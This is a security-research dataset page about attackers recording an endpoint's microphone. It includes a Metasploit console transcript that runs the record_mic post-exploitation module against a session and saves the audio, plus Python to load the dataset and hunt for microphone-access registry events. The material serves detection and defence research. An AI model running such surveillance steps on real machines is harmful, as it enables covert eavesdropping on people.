MSF Record Mic

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/06/09
Modification Date: 2020/06/09
Tactics: TA0009
Techniques: T1123
Tags: Microphone Access

Dataset Description

This dataset represents adversaries accessing the microphone of an endpoint.

Simulation Metadata

Tools

type  Name        Module
----  ----        ------
C2    Metasploit  post

Adversary View

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Download the zipped dataset and extract its first (only) member to the working directory
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip'
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is JSON lines: one event per line
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)
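
Going one step past the channel summary, the following added example (not part of the original dataset page) hunts for microphone use in events of the same JSON-lines layout. It assumes Sysmon registry events (EventID 13) are collected with `EventID`, `TargetObject`, `Image` and `Hostname` fields, and that Windows records microphone use by desktop applications under the `CapabilityAccessManager\ConsentStore\microphone\NonPackaged` registry key; the sample events are constructed, and `find_mic_access` is a hypothetical helper name.

```python
import json

SYSMON = "Microsoft-Windows-Sysmon/Operational"
# Assumption: Windows records microphone use by desktop apps under this key.
MIC_KEY = r"\capabilityaccessmanager\consentstore\microphone\nonpackaged"
BASE = (r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows"
        r"\CurrentVersion\CapabilityAccessManager\ConsentStore")
APP = r"C:#Users#demo#AppData#Local#Temp#sample.exe"  # constructed app path
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed sample events (not taken from the dataset), one JSON object per line.
SAMPLE_LINES = [json.dumps(e) for e in [
    {"Channel": SYSMON, "EventID": 13, "Hostname": "HOST-A", "Image": SVCHOST,
     "TargetObject": BASE + "\\microphone\\NonPackaged\\" + APP + "\\LastUsedTimeStart"},
    {"Channel": SYSMON, "EventID": 13, "Hostname": "HOST-A", "Image": SVCHOST,
     "TargetObject": BASE + "\\microphone\\NonPackaged\\" + APP + "\\LastUsedTimeStop"},
    {"Channel": SYSMON, "EventID": 13, "Hostname": "HOST-A", "Image": SVCHOST,
     "TargetObject": BASE + "\\webcam\\NonPackaged\\" + APP + "\\LastUsedTimeStart"},
    {"Channel": SYSMON, "EventID": 1, "Hostname": "HOST-A", "Image": SVCHOST},
    {"Channel": "Security", "EventID": 4688, "Hostname": "HOST-A"},
]]

def find_mic_access(lines):
    """Return one record per Sysmon registry write under the microphone key."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("Channel") != SYSMON or str(ev.get("EventID")) != "13":
            continue
        target = ev.get("TargetObject") or ""
        idx = target.lower().find(MIC_KEY)
        if idx < 0:
            continue
        # Remainder looks like <app path with '#' separators>\<value name>
        parts = target[idx + len(MIC_KEY):].strip("\\").split("\\")
        if len(parts) < 2:
            continue  # write to the key itself, no per-application subkey
        hits.append({"Hostname": ev.get("Hostname"),
                     "App": parts[0].replace("#", "\\"),  # restore real path
                     "Value": parts[-1],
                     "WrittenBy": ev.get("Image")})
    return hits

if __name__ == "__main__":
    for hit in find_mic_access(SAMPLE_LINES):
        print(hit)
```

To run it over the downloaded file, pass `open(datasetJSONPath)` in place of `SAMPLE_LINES`; an empty result may only mean the assumed events were not collected.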